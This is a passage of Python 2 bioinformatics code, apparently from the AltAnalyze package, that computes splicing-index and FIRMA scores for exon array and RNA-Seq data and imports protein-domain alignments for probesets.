check_for_redundant.append(exon)
for entry in possibly_redundant:
exon = entry[1][0]
if exon not in check_for_redundant:
non_redundant.append(entry)
for entry in non_redundant:
if entry[2] == 'ei-ex':
if entry[3] == 'upregulated': unique_exon_inclusion_count += 1
else: unique_exon_exclusion_count += 1
else: unique_mutual_exclusive_count += 1
udI = unique_exon_inclusion_count; ddI = unique_exon_exclusion_count; mx = unique_mutual_exclusive_count
###Add splice event information to the functional_annotation_db
for splice_event in splice_event_db:count = splice_event_db[splice_event]; functional_annotation_db.append((splice_event,count))
if analysis_method == 'splicing-index' or analysis_method == 'FIRMA': udI='NA'; ddI='NA'
summary_results_db[dataset_name[0:-1]] = udI,ddI,mx,up_splice_val_genes,down_dI_genes,(up_splice_val_genes + down_dI_genes),upregulated_genes, downregulated_genes, diff_exp_spliced_genes, upregulated_rna_factor,downregulated_rna_factor,diff_spliced_rna_factor,down_avg,down_std,up_avg,up_std,p,median_fold_diff,functional_annotation_db
result_list = exportComparisonSummary(dataset_name,summary_data_db,'log')
###Re-set this variable (useful for testing purposes)
clearObjectsFromMemory(gene_expression_diff_db)
clearObjectsFromMemory(splice_event_list); clearObjectsFromMemory(si_db); si_db=[]
clearObjectsFromMemory(fdr_exon_stats)
try: clearObjectsFromMemory(excluded_probeset_db); clearObjectsFromMemory(ex_db); ex_db=[]
except Exception: ex_db=[]
clearObjectsFromMemory(exon_db)
#clearObjectsFromMemory(annotate_db)
critical_probeset_annotation_db=[]; gene_expression_diff_db=[]; domain_associated_genes=[]; permute_p_values=[]
permute_miR_inputs=[]; seq_attribute_str=[]; microRNA_count_db=[]; excluded_probeset_db=[]; fdr_exon_stats=[]
splice_event_list=[]; critical_exon_db_len=len(critical_exon_db)#; critical_exon_db=[] deleting here will cause a global instance problem
all_domain_gene_hits=[]; gene_splice_event_score=[]; unique_exon_event_db=[]; probeset_aligning_db=[]; ranked_uniprot_list_all=[];
filtered_microRNA_exon_db=[]; permute_domain_inputs=[]; functional_annotation_db2=[]; functional_attribute_db2=[]; protein_length_list=[];
ranked_uniprot_list_coding_only=[]; miR_str=[]; permute_input_list=[]; microRNA_exon_feature_db2=[]; alternatively_reg_tc=[];
direct_domain_gene_alignments=[]; aspire_gene_results=[]; domain_gene_counts=[]; functional_annotation=[]; protein_exon_feature_db2=[];
microRNA_attribute_db=[]; probeset_mirBS_db=[]; exon_hits=[]; critical_gene_exons=[]; gene_exon_region=[]; exon_db=[]; external_exon_annot=[];
values=[]; down_protein_list=[]; functional_annotation_db=[]; protein_length_fold_diff=[]; comparison_count=[]; filtered_arrayids=[];
domain_hit_gene_count_db=[]; up_protein_list=[]; probeset_domain_db=[]
try: goelite_data.close()
except Exception: null=[]
"""
print 'local vars'
all = [var for var in locals() if (var[:2], var[-2:]) != ("__", "__")]
for var in all:
try:
if len(locals()[var])>500: print var, len(locals()[var])
except Exception: null=[]
"""
return summary_results_db, summary_results_db2, aspire_output, aspire_output_gene, critical_exon_db_len
def deviation(dI,avg_dI,stdev_dI):
dI = covertLogFoldToNonLogFloat(dI)
avg_dI = covertLogFoldToNonLogFloat(avg_dI)
stdev_dI = covertLogFoldToNonLogFloat(stdev_dI)
return str(abs((dI-avg_dI)/stdev_dI))
def covertLogExpressionToNonLog(log_val):
if normalization_method == 'RPKM':
nonlog_val = (math.pow(2,float(log_val)))
else:
nonlog_val = (math.pow(2,float(log_val)))-1
return str(nonlog_val)
def covertLogFoldToNonLog(log_val):
try:
if float(log_val)<0: nonlog_val = (-1/math.pow(2,(float(log_val))))
else: nonlog_val = (math.pow(2,float(log_val)))
except Exception: nonlog_val = log_val
return str(nonlog_val)
def covertLogFoldToNonLogFloat(log_val):
if float(log_val)<0: nonlog_val = (-1/math.pow(2,(float(log_val))))
else: nonlog_val = (math.pow(2,float(log_val)))
return nonlog_val
def checkForTransSplicing(uid,splicing_event):
pl = string.split(uid,':')
if len(pl)>2:
if pl[0] not in pl[1]: ### Two different genes
if len(splicing_event)>0: splicing_event+= '|trans-splicing'
else: splicing_event = '|trans-splicing'
return splicing_event
def fs(text):
### Formats a text entry to prevent delimiting a comma
return '"'+text+'"'
def analyzeSplicingIndex(fold_dbase):
"""The Splicing Index (SI) represents the log ratio of the exon intensities between the two tissues after normalization
to the gene intensities in each sample: SIi = log2((e1i/g1j)/(e2i/g2j)), for the i-th exon of the j-th gene in tissue
type 1 or 2. The splicing indices are then subjected to a t-test to probe for differential inclusion of the exon into the gene.
In order to determine if the change in isoform expression was statistically significant, a simple two-tailed t-test was carried
out on the isoform ratios by grouping the 10 samples from either "tumor" or "normal" tissue.
The method ultimately producing the highest proportion of true positives was to retain only: a) exons with a DABG p-value < 0.05,
b) genes with a signal > 70, c) exons with a log ratio between tissues (i.e., the gene-level normalized fold change) > 0.5,
d) Splicing Index p-values < 0.005 and e) Core exons.
Gardina PJ, Clark TA, Shimada B, Staples MK, Yang Q, Veitch J, Schweitzer A, Awad T, Sugnet C, Dee S, Davies C, Williams A, Turpaz Y.
Alternative splicing and differential gene expression in colon cancer detected by a whole genome exon array.
BMC Genomics. 2006 Dec 27;7:325. PMID: 17192196
"""
### Used to restrict the analysis to a pre-selected set of probesets (e.g. those that have a specifc splicing pattern)
if len(filtered_probeset_db)>0:
temp_db={}
for probeset in fold_dbase: temp_db[probeset]=[]
for probeset in temp_db:
try: filtered_probeset_db[probeset]
except KeyError: del fold_dbase[probeset]
### Used to restrict the analysis to a pre-selected set of probesets (e.g. those that have a specifc splicing annotation)
if filter_for_AS == 'yes':
proceed = 0
for probeset in exon_db:
as_call = exon_db[probeset].SplicingCall()
if as_call == 0:
try: del fold_dbase[probeset]
except KeyError: null=[]
### Used to the export relative individual adjusted probesets fold changes used for splicing index values
if export_NI_values == 'yes':
summary_output = root_dir+'AltResults/RawSpliceData/'+species+'/'+analysis_method+'/'+dataset_name[:-1]+'.txt'
data = export.ExportFile(summary_output)
title = string.join(['gene\tExonID\tprobesets']+original_array_names,'\t')+'\n'; data.write(title)
print 'Calculating splicing-index values (please be patient)...',
if array_type == 'RNASeq': id_name = 'exon/junction IDs'
else: id_name = 'array IDs'
print len(fold_dbase),id_name,'beging examined'
###original_avg_const_exp_db contains constitutive mean expression values per group: G6953871 [7.71, 7.66]
###array_raw_group_values: Raw expression values in list of groups: G7072464@J935416_RC@j_at ([1.79, 2.16, 2.22], [1.68, 2.24, 1.97, 1.92, 2.12])
###avg_const_exp_db contains the raw constitutive expression values in a single list
splicing_index_hash=[]; excluded_probeset_db={}; denominator_probesets=0; interaction = 0
original_increment = int(len(exon_db)/20); increment = original_increment
for probeset in exon_db:
ed = exon_db[probeset]
#include_probeset = ed.IncludeProbeset()
if interaction == increment: increment+=original_increment; print '*',
interaction +=1
include_probeset = 'yes' ###Moved this filter to import of the probeset relationship file
###Examines user input parameters for inclusion of probeset types in the analysis
if include_probeset == 'yes':
geneid = ed.GeneID()
if probeset in fold_dbase and geneid in original_avg_const_exp_db: ###used to search for array_raw_group_values, but when filtered by expression changes, need to filter by adj_fold_dbase
denominator_probesets+=1
###Includes probesets with a calculated constitutive expression value for each gene and expression data for that probeset
group_index = 0; si_interim_group_db={}; si_interim_group_str_db={}; ge_threshold_count=0; value_count = 0
for group_values in array_raw_group_values[probeset]:
"""gene_expression_value = math.pow(2,original_avg_const_exp_db[geneid][group_index])
###Check to see if gene expression is > threshod for both conditions
if gene_expression_value>gene_expression_threshold:ge_threshold_count+=1"""
value_index = 0; ratio_hash=[]; ratio_str_hash=[]
for value in group_values: ###Calculate normalized ratio's for each condition and save raw values for later permutation
#exp_val = math.pow(2,value);ge_val = math.pow(2,avg_const_exp_db[geneid][value_count]) ###To calculate a ttest we need the raw constitutive expression values, these are not in group list form but are all in a single list so keep count.
exp_val = value;ge_val = avg_const_exp_db[geneid][value_count]
exp_ratio = exp_val-ge_val; ratio_hash.append(exp_ratio); ratio_str_hash.append(str(exp_ratio))
value_index +=1; value_count +=1
si_interim_group_db[group_index] = ratio_hash
si_interim_group_str_db[group_index] = ratio_str_hash
group_index+=1
group1_ratios = si_interim_group_db[0]; group2_ratios = si_interim_group_db[1]
group1_mean_ratio = statistics.avg(group1_ratios); group2_mean_ratio = statistics.avg(group2_ratios)
if export_NI_values == 'yes':
try: er = ed.ExonID()
except Exception: er = 'NA'
ev = string.join([geneid+'\t'+er+'\t'+probeset]+si_interim_group_str_db[0]+si_interim_group_str_db[1],'\t')+'\n'; data.write(ev)
#if ((math.log(group1_mean_ratio,2))*(math.log(group2_mean_ratio,2)))<0: opposite_SI_log_mean = 'yes'
if (group1_mean_ratio*group2_mean_ratio)<0: opposite_SI_log_mean = 'yes'
else: opposite_SI_log_mean = 'no'
try:
if calculate_normIntensity_p == 'yes':
try:
normIntensityP = statistics.runComparisonStatistic(group1_ratios,group2_ratios,probability_statistic)
except Exception: normIntensityP = 'NA' ### Occurs when analyzing two groups with no variance
else: normIntensityP = 'NA' ### Set to an always signficant value
if normIntensityP == 1: normIntensityP = 'NA'
splicing_index = group1_mean_ratio-group2_mean_ratio; abs_splicing_index = abs(splicing_index)
#if probeset == '3061323': print abs_splicing_index,normIntensityP,ed.ExonID(),group1_mean_ratio,group2_mean_ratio,math.log(group1_mean_ratio,2),math.log(group2_mean_ratio,2),((math.log(group1_mean_ratio,2))*(math.log(group2_mean_ratio,2))),opposite_SI_log_mean; kill
if probeset in midas_db:
try: midas_p = float(midas_db[probeset])
except ValueError:
midas_p = 0
#if abs_splicing_index>1 and normIntensityP < 0.05: print probeset,normIntensityP, abs_splicing_index;kill
else: midas_p = 0
#print ed.GeneID(),ed.ExonID(),probeset,splicing_index,normIntensityP,midas_p,group1_ratios,group2_ratios
if abs_splicing_index>alt_exon_logfold_cutoff and (normIntensityP < p_threshold or normIntensityP == 'NA' or normIntensityP == 1) and midas_p < p_threshold:
exonid = ed.ExonID(); critical_exon_list = [1,[exonid]]
constit_exp1 = original_avg_const_exp_db[geneid][0]
constit_exp2 = original_avg_const_exp_db[geneid][1]
ge_fold=constit_exp2-constit_exp1
### Re-define all of the pairwise values now that the two Splicing-Index groups to report have been determined
data_list1 = array_raw_group_values[probeset][0]; data_list2 = array_raw_group_values[probeset][1]
baseline_exp = statistics.avg(data_list1); experimental_exp = statistics.avg(data_list2); fold_change = experimental_exp - baseline_exp
try:
ttest_exp_p = statistics.runComparisonStatistic(data_list1,data_list2,probability_statistic)
except Exception: ttest_exp_p = 1
normInt1 = (baseline_exp-constit_exp1); normInt2 = (experimental_exp-constit_exp2); adj_fold = normInt2 - normInt1
ped = ProbesetExpressionData(baseline_exp, experimental_exp, fold_change, adj_fold, ttest_exp_p, '')
sid = ExonData(splicing_index,probeset,critical_exon_list,geneid,group1_ratios,group2_ratios,normIntensityP,opposite_SI_log_mean)
sid.setConstitutiveExpression(constit_exp1); sid.setConstitutiveFold(ge_fold); sid.setProbesetExpressionData(ped)
splicing_index_hash.append((splicing_index,sid))
else:
### Also record the data for probesets that are excluded... Used by DomainGraph
eed = ExcludedExonData(splicing_index,geneid,normIntensityP)
excluded_probeset_db[probeset] = eed
except Exception:
null = [] ###If this occurs, then most likely, the exon and constitutive probeset are the same
print 'Splicing Index analysis complete'
if export_NI_values == 'yes': data.close()
splicing_index_hash.sort(); splicing_index_hash.reverse()
print len(splicing_index_hash),id_name,"with evidence of Alternative expression"
p_value_call=''; permute_p_values = {}; summary_data_db['denominator_exp_events']=denominator_probesets
return splicing_index_hash,p_value_call,permute_p_values, excluded_probeset_db
def importResiduals(filename,probe_probeset_db):
fn=filepath(filename); key_db = {}; x=0; prior_uid = ''; uid_gene_db={}
for line in open(fn,'rU').xreadlines():
if x == 0 and line[0] == '#': null=[]
elif x == 0: x+=1
else:
data = cleanUpLine(line)
t = string.split(data,'\t')
uid = t[0]; uid,probe = string.split(uid,'-')
try:
probeset = probe_probeset_db[probe]; residuals = t[1:]
if uid == prior_uid:
try: uid_gene_db[probeset].append(residuals) ### Don't need to keep track of the probe ID
except KeyError: uid_gene_db[probeset] = [residuals]
else: ### Hence, we have finished storing all residual data for that gene
if len(uid_gene_db)>0: calculateFIRMAScores(uid_gene_db); uid_gene_db={}
try: uid_gene_db[probeset].append(residuals) ### Don't need to keep track of the probe ID
except KeyError: uid_gene_db[probeset] = [residuals]
prior_uid = uid
except Exception: null=[]
### For the last gene imported
if len(uid_gene_db)>0: calculateFIRMAScores(uid_gene_db)
def calculateFIRMAScores(uid_gene_db):
probeset_residuals={}; all_gene_residuals=[]; total_probes=0
for probeset in uid_gene_db:
residuals_list = uid_gene_db[probeset]; sample_db={}; total_probes+=len(residuals_list)
### For all probes in a probeset, calculate the median residual for each sample
for residuals in residuals_list:
index=0
for residual in residuals:
try: sample_db[index].append(float(residual))
except KeyError: sample_db[index] = [float(residual)]
all_gene_residuals.append(float(residual))
index+=1
for index in sample_db:
median_residual = statistics.median(sample_db[index])
sample_db[index] = median_residual
probeset_residuals[probeset] = sample_db
### Calculate the Median absolute deviation
"""http://en.wikipedia.org/wiki/Absolute_deviation
The median absolute deviation (also MAD) is the median absolute deviation from the median. It is a robust estimator of dispersion.
For the example {2, 2, 3, 4, 14}: 3 is the median, so the absolute deviations from the median are {1, 1, 0, 1, 11} (or reordered as
{0, 1, 1, 1, 11}) with a median absolute deviation of 1, in this case unaffected by the value of the outlier 14.
Here, the global gene median will be expressed as res_gene_median.
"""
res_gene_median = statistics.median(all_gene_residuals); subtracted_residuals=[]
for residual in all_gene_residuals: subtracted_residuals.append(abs(res_gene_median-residual))
gene_MAD = statistics.median(subtracted_residuals)
#if '3263614' in probeset_residuals: print len(all_gene_residuals),all_gene_residuals
for probeset in probeset_residuals:
sample_db = probeset_residuals[probeset]
for index in sample_db:
median_residual = sample_db[index]
try:
firma_score = median_residual/gene_MAD
sample_db[index] = firma_score
except Exception: null=[]
#if probeset == '3263614': print index, median_residual, firma_score, gene_MAD
firma_scores[probeset] = sample_db
def importProbeToProbesets(fold_dbase):
#print "Importing probe-to-probeset annotations (please be patient)..."
filename = 'AltDatabase/'+species+'/'+array_type+'/'+species+'_probeset-probes.txt'
probeset_to_include={}
gene2examine={}
### Although we want to restrict the analysis to probesets in fold_dbase, we don't want to effect the FIRMA model - filter later
for probeset in fold_dbase:
try: ed = exon_db[probeset]; gene2examine[ed.GeneID()]=[]
except Exception: null=[]
for gene in original_avg_const_exp_db: gene2examine[gene]=[]
for probeset in exon_db:
ed = exon_db[probeset]; geneid = ed.GeneID()
if geneid in gene2examine:
gene2examine[geneid].append(probeset) ### Store these so we can break things up
probeset_to_include[probeset]=[]
probeset_probe_db = importGenericFilteredDBList(filename,probeset_to_include)
### Get Residuals filename and verify it's presence
#print "Importing comparison residuals..."
filename_objects = string.split(dataset_name[:-1],'.p'); filename = filename_objects[0]+'.txt'
if len(array_group_list)==2:
filename = import_dir = root_dir+'AltExpression/FIRMA/residuals/'+array_type+'/'+species+'/'+filename
else: filename = import_dir = root_dir+'AltExpression/FIRMA/FullDatasets/'+array_type+'/'+species+'/'+filename
status = verifyFile(filename)
if status != 'found':
print_out = 'The residual file:'; print_out+= filename
print_out+= 'was not found in the default location.\nPlease make re-run the analysis from the Beginning.'
try: UI.WarningWindow(print_out,'Exit')
except Exception: print print_out
print traceback.format_exc(); badExit()
print "Calculating FIRMA scores..."
input_count = len(gene2examine) ### Number of probesets or probeset pairs (junction array) alternatively regulated
original_increment = int(input_count/20); increment = original_increment
start_time = time.time(); x=0
probe_probeset_db={}; gene_count=0; total_gene_count = 0; max_gene_count=3000; round = 1
for gene in gene2examine:
gene_count+=1; total_gene_count+=1; x+=1
#if x == increment: increment+=original_increment; print '*',
for probeset in gene2examine[gene]:
for probe in probeset_probe_db[probeset]: probe_probeset_db[probe] = probeset
if gene_count == max_gene_count:
### Import residuals and calculate primary sample/probeset FIRMA scores
importResiduals(filename,probe_probeset_db)
#print max_gene_count*round,"genes"
print '*',
gene_count=0; probe_probeset_db={}; round+=1 ### Reset these variables and re-run
probeset_probe_db={}
### Analyze residuals for the remaining probesets (< max_gene_count)
importResiduals(filename,probe_probeset_db)
end_time = time.time(); time_diff = int(end_time-start_time)
print "FIRMA scores calculted for",total_gene_count, "genes in %d seconds" % time_diff
def FIRMAanalysis(fold_dbase):
"""The FIRMA method calculates a score for each probeset and for each samples within a group of arrays, independent
of group membership. However, in AltAnalyze, these analyses are performed dependent on group. The FIRMA score is calculated
by obtaining residual values (residuals is a variable for each probe that can't be explained by the GC content or intensity
of that probe) from APT, for all probes corresponding to a metaprobeset (Ensembl gene in AltAnalyze). These probe residuals
are imported and the ratio of the median residual per probeset per sample divided by the absolute standard deviation of the
median of all probes for all samples for that gene."""
### Used to restrict the analysis to a pre-selected set of probesets (e.g. those that have a specifc splicing pattern)
if len(filtered_probeset_db)>0:
temp_db={}
for probeset in fold_dbase: temp_db[probeset]=[]
for probeset in temp_db:
try: filtered_probeset_db[probeset]
except KeyError: del fold_dbase[probeset]
### Used to restrict the analysis to a pre-selected set of probesets (e.g. those that have a specifc splicing annotation)
if filter_for_AS == 'yes':
proceed = 0
for probeset in exon_db:
as_call = exon_db[probeset].SplicingCall()
if as_call == 0:
try: del fold_dbase[probeset]
except KeyError: null=[]
#print 'Beginning FIRMA analysis (please be patient)...'
### Used to the export relative individual adjusted probesets fold changes used for splicing index values
if export_NI_values == 'yes':
sample_names_ordered = [] ### note: Can't use original_array_names since the order is potentially different (FIRMA stores sample data as indeces within dictionary keys)
for group_name in array_group_list: ### THIS LIST IS USED TO MAINTAIN CONSISTENT GROUP ORDERING DURING ANALYSIS
for sample_name in array_group_name_db[group_name]: sample_names_ordered.append(sample_name)
summary_output = root_dir+'AltResults/RawSpliceData/'+species+'/'+analysis_method+'/'+dataset_name[:-1]+'.txt'
data = export.ExportFile(summary_output)
title = string.join(['gene-probesets']+sample_names_ordered,'\t')+'\n'; data.write(title)
### Import probes for probesets to be analyzed
global firma_scores; firma_scores = {}
importProbeToProbesets(fold_dbase)
print 'FIRMA scores obtained for',len(firma_scores),'probests.'
### Group sample scores for each probeset and calculate statistics
firma_hash=[]; excluded_probeset_db={}; denominator_probesets=0; interaction = 0
original_increment = int(len(firma_scores)/20); increment = original_increment
for probeset in firma_scores:
if probeset in fold_dbase: ### Filter based on expression
ed = exon_db[probeset]; geneid = ed.GeneID()
if interaction == increment: increment+=original_increment; print '*',
interaction +=1; denominator_probesets+=1
sample_db = firma_scores[probeset]
###Use the index values from performExpressionAnalysis to assign each expression value to a new database
firma_group_array = {}
for group_name in array_group_db:
for array_index in array_group_db[group_name]:
firma_score = sample_db[array_index]
try: firma_group_array[group_name].append(firma_score)
except KeyError: firma_group_array[group_name] = [firma_score]
###array_group_list should already be unique and correctly sorted (see above)
firma_lists=[]; index=0
for group_name in array_group_list:
firma_list = firma_group_array[group_name]
if len(array_group_list)>2: firma_list = statistics.avg(firma_list), firma_list, index
firma_lists.append(firma_list); index+=1
if export_NI_values == 'yes': ### DO THIS HERE SINCE firma_lists IS SORTED BELOW!!!!
try: er = ed.ExonID()
except Exception: er = 'NA'
export_list = [geneid+'\t'+er+'\t'+probeset]; export_list2=[]
for firma_ls in firma_lists:
if len(array_group_list)>2: firma_ls =firma_ls[1] ### See above modification of firma_list object for multiple group anlaysis
export_list+=firma_ls
for i in export_list: export_list2.append(str(i))
ev = string.join(export_list2,'\t')+'\n'; data.write(ev)
if len(array_group_list)==2:
firma_list1 = firma_lists[0]; firma_list2 = firma_lists[-1]; firma_avg1 = statistics.avg(firma_list1); firma_avg2 = statistics.avg(firma_list2)
index1=0; index2=1 ### Only two groups, thus only two indeces
else: ### The below code deals with identifying the comparisons which yeild the greatest FIRMA difference
firma_lists.sort(); index1=firma_lists[0][-1]; index2 = firma_lists[-1][-1]
firma_list1 = firma_lists[0][1]; firma_list2 = firma_lists[-1][1]; firma_avg1 = firma_lists[0][0]; firma_avg2 = firma_lists[-1][0]
if calculate_normIntensity_p == 'yes':
try:
normIntensityP = statistics.runComparisonStatistic(firma_list1,firma_list2,probability_statistic)
except Exception: normIntensityP = 'NA' ### Occurs when analyzing two groups with no variance
else: normIntensityP = 'NA'
if normIntensityP == 1: normIntensityP = 'NA'
firma_fold_change = firma_avg2 - firma_avg1
firma_fold_change = -1*firma_fold_change ### Make this equivalent to Splicing Index fold which is also relative to experimental not control
if (firma_avg2*firma_avg1)<0: opposite_FIRMA_scores = 'yes'
else: opposite_FIRMA_scores = 'no'
if probeset in midas_db:
try: midas_p = float(midas_db[probeset])
except ValueError: midas_p = 0
else: midas_p = 0
#if probeset == '3263614': print firma_fold_change, normIntensityP, midas_p,'\n',firma_list1, firma_list2, [p_threshold];kill
if abs(firma_fold_change)>alt_exon_logfold_cutoff and (normIntensityP < p_threshold or normIntensityP == 'NA') and midas_p < p_threshold:
exonid = ed.ExonID(); critical_exon_list = [1,[exonid]]
#gene_expression_values = original_avg_const_exp_db[geneid]
constit_exp1 = original_avg_const_exp_db[geneid][index1]
constit_exp2 = original_avg_const_exp_db[geneid][index2]
ge_fold = constit_exp2-constit_exp1
### Re-define all of the pairwise values now that the two FIRMA groups to report have been determined
data_list1 = array_raw_group_values[probeset][index1]; data_list2 = array_raw_group_values[probeset][index2]
baseline_exp = statistics.avg(data_list1); experimental_exp = statistics.avg(data_list2); fold_change = experimental_exp - baseline_exp
group_name1 = array_group_list[index1]; group_name2 = array_group_list[index2]
try:
ttest_exp_p = statistics.runComparisonStatistic(data_list1,data_list2,probability_statistic)
except Exception: ttest_exp_p = 1
normInt1 = (baseline_exp-constit_exp1); normInt2 = (experimental_exp-constit_exp2); adj_fold = normInt2 - normInt1
ped = ProbesetExpressionData(baseline_exp, experimental_exp, fold_change, adj_fold, ttest_exp_p, group_name2+'_vs_'+group_name1)
fid = ExonData(firma_fold_change,probeset,critical_exon_list,geneid,data_list1,data_list2,normIntensityP,opposite_FIRMA_scores)
fid.setConstitutiveExpression(constit_exp1); fid.setConstitutiveFold(ge_fold); fid.setProbesetExpressionData(ped)
firma_hash.append((firma_fold_change,fid))
#print [[[probeset,firma_fold_change,normIntensityP,p_threshold]]]
else:
### Also record the data for probesets that are excluded... Used by DomainGraph
eed = ExcludedExonData(firma_fold_change,geneid,normIntensityP)
excluded_probeset_db[probeset] = eed
print 'FIRMA analysis complete'
if export_NI_values == 'yes': data.close()
firma_hash.sort(); firma_hash.reverse()
print len(firma_hash),"Probesets with evidence of Alternative expression out of",len(excluded_probeset_db)+len(firma_hash)
p_value_call=''; permute_p_values = {}; summary_data_db['denominator_exp_events']=denominator_probesets
return firma_hash,p_value_call,permute_p_values, excluded_probeset_db
def getFilteredFilename(filename):
if array_type == 'junction':
filename = string.replace(filename,'.txt','-filtered.txt')
return filename
def getExonVersionFilename(filename):
original_filename = filename
if array_type == 'junction' or array_type == 'RNASeq':
if explicit_data_type != 'null':
filename = string.replace(filename,array_type,array_type+'/'+explicit_data_type)
### Make sure the file exists, otherwise, use the original
file_status = verifyFile(filename)
#print [[filename,file_status]]
if file_status != 'found': filename = original_filename
return filename
def importProbesetAligningDomains(exon_db,report_type):
filename = 'AltDatabase/'+species+'/'+array_type+'/'+species+'_Ensembl_domain_aligning_probesets.txt'
filename=getFilteredFilename(filename)
probeset_aligning_db = importGenericDBList(filename)
filename = 'AltDatabase/'+species+'/'+array_type+'/'+species+'_Ensembl_indirect_domain_aligning_probesets.txt'
filename=getFilteredFilename(filename)
probeset_indirect_aligning_db = importGenericDBList(filename)
if array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
new_exon_db={}; splicing_call_db={}
for probeset_pair in exon_db:
### For junction analyses exon_db is really regulated_exon_junction_db, containing the inclusion,exclusion probeset tuple and an object as values
ed = exon_db[probeset_pair]; geneid = ed.GeneID(); critical_exons = ed.CriticalExons()
for exon in critical_exons:
new_key = geneid+':'+exon
try: new_exon_db[new_key].append(probeset_pair)
except KeyError: new_exon_db[new_key] = [probeset_pair]
try: splicing_call_db[new_key].append(ed.SplicingCall())
except KeyError: splicing_call_db[new_key] = [ed.SplicingCall()]
for key in new_exon_db:
probeset_pairs = new_exon_db[key]; probeset_pair = probeset_pairs[0] ### grab one of the probeset pairs
ed = exon_db[probeset_pair]; geneid = ed.GeneID()
jd = SimpleJunctionData(geneid,'','','',probeset_pairs) ### use only those necessary fields for this function (probeset pairs will be called as CriticalExons)
splicing_call_db[key].sort(); splicing_call = splicing_call_db[key][-1]; jd.setSplicingCall(splicing_call) ### Bug from 1.15 to have key be new_key?
new_exon_db[key] = jd
exon_db = new_exon_db
gene_protein_ft_db={};domain_gene_count_db={};protein_functional_attribute_db={}; probeset_aligning_db2={}
splicing_call_db=[]; new_exon_db=[] ### Clear memory
for probeset in exon_db:
#if probeset == '107650':
#if probeset in probeset_aligning_db: print probeset_aligning_db[probeset];kill
if probeset in probeset_aligning_db:
proceed = 'no'
if filter_for_AS == 'yes':
as_call = exon_db[probeset].SplicingCall()
if as_call == 1: proceed = 'yes'
else: proceed = 'yes'
gene = exon_db[probeset].GeneID()
new_domain_list=[]; new_domain_list2=[]
if report_type == 'gene' and proceed == 'yes':
for domain in probeset_aligning_db[probeset]:
try: domain_gene_count_db[domain].append(gene)
except KeyError: domain_gene_count_db[domain] = [gene]
try: gene_protein_ft_db[gene].append(domain)
except KeyError: gene_protein_ft_db[gene]=[domain]
elif proceed == 'yes':
if array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
probeset_list = exon_db[probeset].CriticalExons()
else: probeset_list = [probeset]
for id in probeset_list:
for domain in probeset_aligning_db[probeset]:
new_domain_list.append('(direct)'+domain)
new_domain_list2.append((domain,'+'))
new_domain_list = unique.unique(new_domain_list)
new_domain_list_str = string.join(new_domain_list,', ')
gene_protein_ft_db[gene,id] = new_domain_list2
probeset_aligning_db2[id] = new_domain_list_str
#print exon_db['107650']
for probeset in exon_db:
if probeset in probeset_indirect_aligning_db:
proceed = 'no'
if filter_for_AS == 'yes':
as_call = exon_db[probeset].SplicingCall()
if as_call == 1: proceed = 'yes'
else: proceed = 'yes'
gene = exon_db[probeset].GeneID()
new_domain_list=[]; new_domain_list2=[]
if report_type == 'gene' and proceed == 'yes':
for domain in probeset_indirect_aligning_db[probeset]:
try: domain_gene_count_db[domain].append(gene)
except KeyError: domain_gene_count_db[domain] = [gene]
try: gene_protein_ft_db[gene].append(domain)
except KeyError: gene_protein_ft_db[gene]=[domain]
elif proceed == 'yes':
if array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
probeset_list = exon_db[probeset].CriticalExons()
else: probeset_list = [probeset]
for id in probeset_list:
for domain in probeset_indirect_aligning_db[probeset]:
new_domain_list.append('(indirect)'+domain)
new_domain_list2.append((domain,'-'))
new_domain_list = unique.unique(new_domain_list)
new_domain_list_str = string.join(new_domain_list,', ')
gene_protein_ft_db[gene,id] = new_domain_list2
probeset_aligning_db2[id] = new_domain_list_str
domain_gene_count_db = eliminate_redundant_dict_values(domain_gene_count_db)
gene_protein_ft_db = eliminate_redundant_dict_values(gene_protein_ft_db)
if analysis_method == 'ASPIRE' or analysis_method == 'linearregres':
clearObjectsFromMemory(exon_db);exon_db=[]
try: clearObjectsFromMemory(new_exon_db)
except Exception: null=[]
probeset_indirect_aligning_db=[]; probeset_aligning_db=[]
if report_type == 'perfect_match':
gene_protein_ft_db=[];domain_gene_count_db=[];protein_functional_attribute_db=[]
return probeset_aligning_db2
elif report_type == 'probeset':
probeset_aligning_db2=[]
return gene_protein_ft_db,domain_gene_count_db,protein_functional_attribute_db
else:
probeset_aligning_db2=[]; protein_functional_attribute_db=[]; probeset_aligning_db2=[]
len_gene_protein_ft_db = len(gene_protein_ft_db); gene_protein_ft_db=[]
return len_gene_protein_ft_db,domain_gene_count_db
def importProbesetProteinCompDomains(exon_db,report_type,comp_type):
filename = 'AltDatabase/'+species+'/'+array_type+'/probeset-domain-annotations-'+comp_type+'.txt'
if (array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type != 'null': filename=getFilteredFilename(filename)
filename=getExonVersionFilename(filename)
probeset_aligning_db = importGeneric(filename)
filename = 'AltDatabase/'+species+'/'+array_type+'/probeset-protein-annotations-'+comp_type+'.txt'
if (array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type != 'null': filename=getFilteredFilename(filename)
filename=getExonVersionFilename(filename)
gene_protein_ft_db={};domain_gene_count_db={}
for probeset in exon_db:
initial_proceed = 'no'; original_probeset = probeset
if probeset in probeset_aligning_db: initial_proceed = 'yes'
elif array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
### For junction analyses exon_db is really regulated_exon_junction_db, containing the inclusion,exclusion probeset tuple and an object as values
if '|' in probeset[0]: probeset1 = string.split(probeset[0],'|')[0]; probeset = probeset1,probeset[1]
try: alternate_probeset_id = exon_db[probeset].InclusionLookup(); probeset = alternate_probeset_id,probeset[1]
except Exception: null=[]
probeset_joined = string.join(probeset,'|')
#print [probeset_joined],[probeset]
if probeset_joined in probeset_aligning_db: initial_proceed = 'yes'; probeset = probeset_joined
elif probeset[0] in probeset_aligning_db: initial_proceed = 'yes'; probeset = probeset[0]
elif probeset[1] in probeset_aligning_db: initial_proceed = 'yes'; probeset = probeset[1]
#else: for i in probeset_aligning_db: print [i];kill
if initial_proceed == 'yes':
proceed = 'no'
if filter_for_AS == 'yes':
as_call = exon_db[original_probeset].SplicingCall()
if as_call == 1: proceed = 'yes'
else: proceed = 'yes'
new_domain_list = []
gene = exon_db[original_probeset].GeneID()
if report_type == 'gene' and proceed == 'yes':
for domain_data in probeset_aligning_db[probeset]:
try:
domain,call = string.split(domain_data,'|')
except Exception:
values = string.split(domain_data,'|')
